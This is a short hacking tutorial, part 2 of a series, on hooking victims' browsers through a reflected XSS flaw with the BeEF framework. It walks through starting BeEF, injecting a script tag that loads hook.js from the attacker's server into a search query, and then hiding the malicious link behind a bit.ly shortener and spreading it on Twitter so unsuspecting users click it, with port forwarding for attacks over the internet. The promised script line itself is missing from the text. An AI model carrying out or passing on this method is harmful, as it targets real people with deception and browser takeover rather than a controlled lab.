Exploiting XSS with BeEF: Part 2
Now that we have our vulnerable server, it's time to start up BeEF.
If you have Kali, BeEf comes pre-installed. You can find it in /usr/share/beef-xss/. Once you're there, type ./beef to execute the program.
Once you have run BeEF, you can access the web UI through your browser. Type http://your_ip:3000/ui/panel and you will be redirected to the login page.
The default credentials are beef for both the username and password. After logging in, you will be presented with the start/help screen.
Remember that line of text from the terminal earlier? That's the location of our malicious JS code. For me, it's http://10.0.2.13:3000/hook.js .
Since we want this to be run as code, we will implement this with the <script> function of HTML. Your <script> line should look similar to this:
When the victim visits this website, it automatically "searches" for whatever is put behind the query=. But because we have a script, it will be run as a script instead of a search.
In order to "hook" their browser, we need to send them this link. But of course, this might seem suspicious to the average user. But if we were to use a URL shortener like bit.ly, it would be hidden, and more people would click on it on social media.
Most websites that allow you to share articles/videos, etc. automatically include a bit.ly link in the message. If you were to share this bit.ly link on Twitter, no one will think of it being malicious.
Once someone clicks on that innocent-looking link, you will have complete control over their browser! If you are attacking over WAN, don't forget to port forward.
In my next article, I will be explaining how to get a persistent connection with BeEF, including how to get a shell on the victim PC.
C|H of C3